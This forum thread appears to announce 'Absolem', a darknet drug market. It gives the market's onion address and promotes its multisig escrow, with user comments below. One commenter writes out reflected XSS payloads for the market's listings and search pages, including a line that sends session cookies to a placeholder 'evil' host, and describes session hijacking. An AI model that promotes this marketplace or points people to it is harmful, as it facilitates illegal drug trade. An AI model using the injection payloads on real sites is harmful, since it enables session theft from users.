Absolem is officially open for business! (All-Drug market)

A couple of weeks ago we did the first half of the Absolem/Hanana market launch when we launched the Havana market for beta testing. Well, now here's the main event. The all-drug market Absolem is now up and running.

You can check it out at absolem6indyslug.onion


Buyer features:

Vendor features:


If you're curious about the name, Absolem is the name of the hookah-smoking caterpillar who gave Alice mushrooms in wonderland. Absolem market, like Havana, is a pure multi-sig market. Specifically that means Absolem will have no market controlled wallets, no traditional escrow, and limited FE at buyer option, no exit scams, no theft.

But don't let the word multisig scare you off. Try out a purchase to see how easy it is to buy on Absolem. We have a $1.00 sample listing so you can see how easy it is to use. And we'll even refund your $1.00 when you complete a transaction. The multisig is simple for buyers to use, but under the hood there are some advanced features that beat anything competing markets have to offer.

Even if there is a market-ending catastrophe, vendors will not lose the escrow funds, and Absolem doesn't require complicated arrangements between buyer and vendor to make that work. Absolem, like it's sister market, Havana, is a drugs only market. There will be no fraud, carders, weapons, counterfeiters, or assassins. Initially Absolem is only open to registration for North American vendors only.

We will be expanding to global coverage in the near future. Vendor accounts are by application or invitation only and limited to the best vendors in their product categories. We don't understand why other markets allow just anyone to set up a store (with or without a bond, a bad vendor is a bad vendor). We're pretty sure a market doesn't need 10,000+ products for it to have an excellent selection of merchandise by top vendors with products across all price ranges.

We're trying something different here that we hope makes a big difference. We hope you like what you see. If you want to see some of your favorite vendors on a safe multisig market, ask them to list their products at Absolem.


About the SQL/Javascript Injections found by /u/Satoshi-

We have talked with him and have concluded that the vulnerabilities were in fact false positives. The clearnet embedded links have been removed. We would like to thank him for taking time to work with us and figure this out.


Comments


[28 Points] _Colorado_:

This might be the one folks. I can't find any flaws yet.

*First person to post a thorough security audit that is verified accurate by the community will get a 0.3 BTC bounty from me.

**/u/AbsolemHavanaMarkets I invite you to respond to the findings of /u/satoshi-

***/u/Satoshi- has collected the bounty for their efforts.

AbsolemHavanaMarkets

"This is correct. /u/Satoshi- has been a great help to us."


[17 Points] assnapken:

Absolutely beautiful market. I'm excited to give a try soon.


[12 Points] None:

I really enjoy the layout and a multi-sig-only market is definitely needed so props for creating one. I do have a question though - let's say your market goes down. You get paralyzed in a car crash, LE infiltrates, whatever. Don't people need to have the vendors alt contact so they can contact them to finalize in the event of market closure? With that question in mind, I don't know a lot about multisig, and I'm assuming it is 2-of-3.


[4 Points] kahrmine:

What's your buyer history feature like for solving disputes? Is it based on total # of purchases or amount of bitcoin spent? Anyway to import or verify buyer accounts on another market?

It'd be a cool feature to have that's not seen on other markets and could be used to build a "trusted" buyers list.


[4 Points] motsanciens:

How in the HELL did you manage to get that vanity onion?


[3 Points] firstpostthesecond:

How does the vendor and customer know that you are not doing a 2 of 4 transaction secretly since you are creating the transaction?


[2 Points] mjvej4f:

Looks promising, and nice layout aswell. Will be paying close attention to this market :)


[2 Points] None:

Wow, great market


[2 Points] MaltoseMaltase:

Shit looks good.

Amused about the 'shipping and returns' policy, Lmao as if any vendor will ever let you return an item.

Also why is the option only for shipping to united states on the left sidebar.


[2 Points] dnmPerson:

I just read about multi-sig and I have a few questions about your market. This scenario, I assume, generally describes a typical transaction:

"Trustless Escrow

Alice wants to send Bitcoin to Bob, but only if Bob delivers the merchandise he has promised. Bob wants to ensure he is paid for his merchandise. They both trust Trent to adjudicate a dispute but do not wish to trust him with the funds. They create a 2-­of-­3 multi-­sig address with one key each from Alice, Bob and Trent. If the transaction goes smoothly, Alice and Bob can jointly release the funds without Trent’s involvement. If there is a dispute, Trent can adjudicate, and can move the funds in conjunction with either Alice or Bob. During the course of the transaction, the Bitcoin is effectively in a kind of limbo, since no one person can move the funds on his own."

link: https://coincenter.org/2015/01/multi-sig/

1) What happens if Bob sends something to Alice, Alice doesn't want to finalize, and Trent loses his key because he is shut down? Is there an auto-finalize system in place independent of Trent (i.e. a backup end-of-world server of some sort), and who does it favor?

Disputes are settled based on the vendor's policy that the buyer agrees to before buying.

2) So, how is this not an FE option again?

3) I don't understand multi-sig very well. I assume there is a way to ensure that if Trent goes down and there is no dispute between Alice and Bob, that there is still a way to complete the transaction. Is this implemented? If this is not implemented how can a user even ensure that the market is multi-sig?

4) How are you going to make money? Will you eventually have a vendor buy-in or bond, and what cut will you take on transactions?

5) How long after an order will you be able to leave a review and will this time be dated from completion/resolution, or the placement of the order?


[2 Points] darknetmarket:

cant wait to see how this thing does, everything looks very slick so far long live havana!


[2 Points] BMRr:

Can someone correct me if im wrong, but 100% anonymous feedback will promote feedback padding correct? If you cant see who left the feedback they can make tons of purchases with the same account? besides who gives a shit if you see my account name, i dont use it for anything else.


[2 Points] ohThisUsername:

Why does it say "Hi Chaunt36. Welcome back!" When my username is not Chaunt36?

This looks fantastic though. I hope it all works out and some good vendors hop on board.

Edit: When I try sending a message to my actual username it says "No user exists with that alias".


[2 Points] 100MphNeurons:

I've spent a while (like most of today I guess) tinkering with the XSS stuff. I don't get what the server is doing exactly, making it a bit hard to find a reasonable fully weaponized XSS. The listings pages slams stuff on them into a few tags (two forms and two spans). http_this_isnt_a_link.onion/listings/."><h1>Hello</h1><" for instance will pop out a few of them. This would be trivial to replace with <script>... but the latest browser bundle has a bunch of anti-XSS stuff. If you're in anything but chrome though, you could directly do <script src=somewhere> or <script>(function(){document.body.outerHTML=btoa("....")})() .. and so on.

The search function can be injected into and you can get it to execute (search for hi"a><script id='Q'>(function(a){a('Q').outerHTML='<h1>HI</h1>'})(document.getElementById)</script><" for instance), but it's a POST rather than a GET so while it'll get you past XSS blocks there's no obvious automated version.

Another option would be to combine the two, using the first one to inject something useful (high use of <!--) to mod the search, then let it trigger and do something like document.write("<img src='http:slash/someplace.evil/?a="+document.cookie);.

Generally, none of this should be there (access with anything but chrome and you're toast) but there's another layer left before there's an obvious way to weaponize. Several other pages do have more injection vulns, so something should be possible and if not, the busted layer (partial control of the html) should be closed before it does. Either way, it went down for maintenance so I guess that's the size of my poking at it for now.


[2 Points] 100MphNeurons:

Ok, so now my head has cleared a little and I've figured out why the POST inject things matters. I'm sorry this doesn't lead itself very well to a screen shot. [EDIT] It's morning now and I realize this thread has gotten kind of old, the paste-place I put the example at no longer show it correctly, and I probably should have messaged the admin instead of saying it publicly right off. There's basically an XSS issue in a form that allows any third party site visited while logged (doesn't have to be opened, just not logged out) to hijack the session, either through browser manipulation or by getting the session cookies. I'll take this down for now until it's fixed and/or I set up a better example.


[1 Points] Chilled_DNM:

Should open it to more than just North America soon. I look forward to trying it once you have.


[1 Points] superfuckinggay:

Very excited about this market. Do you take vendors from BB? I saw it only mentions Agora.


[1 Points] jackarse321:

The site looks promising.

My question is how is the site going to get $$? I doubt this is created and will be ran for pure altruistic values. If I remember correctly on TMP, there were 2 separate wallet transactions, one where a portion was sent to the site, and then the other transaction that was for the purchase. Is this going to be set up the same way or is the funding going to come from the vendor side? I am excited about a true multi-sig market


[1 Points] mayormaynotbefucked1:

now you just need to convince a half decent german mdma vender to join up...


[1 Points] HulkVsMeth:

Will you support guns?


[1 Points] ShulginsCat:

Very minor, but the /api page shows "ERROR: Invalid API Key" which might give people a hint of which s/w you're using in the backend. May or may not be important, depending what's sitting behind it.


[1 Points] None:

Havana/Absolem is definetely a scam and insecure. They proved it by themselves using shills and exposing terrible coding practices. What a bunch of morons using templates for women clothing stores. Fuckin' gay scammers.


[1 Points] pieintheskyDNM:

This is the best looking market I've seen by a longshot. With multisig, too.


[1 Points] AllJoociedUP:

This is the kind of market I've been waiting for. None of the card dumps, Fullz Social Security Numbers, Amazon Reship, or any of that other crap that give LE bank backing in fighting the markets.

Koodos. I hope my vendors sign up on their. I am signing up. I really really hope it gains momentum. I always felt that if it was JUST drugs then the markets would be far less of a problem, and that the money services and carding section bring unwanted attention from LE and Banks.

Broke cops + Fat pocketed Banker > Broke cop + newly Broke user

when it comes to fighting DNM by LE.


[1 Points] None:

Now thats what im talkin about!


[1 Points] RIP_Havana_Absolem:

RIP You lasted a whole month without getting busted.


[0 Points] None:

TheRealDeal has been up for a bit now and was the first to implement this type of multisig, thank god there are more popping up now.


[-1 Points] swagmaster4204204200:

What's the significance of the name?


[-4 Points] fagfuck666:

Your market sucks ass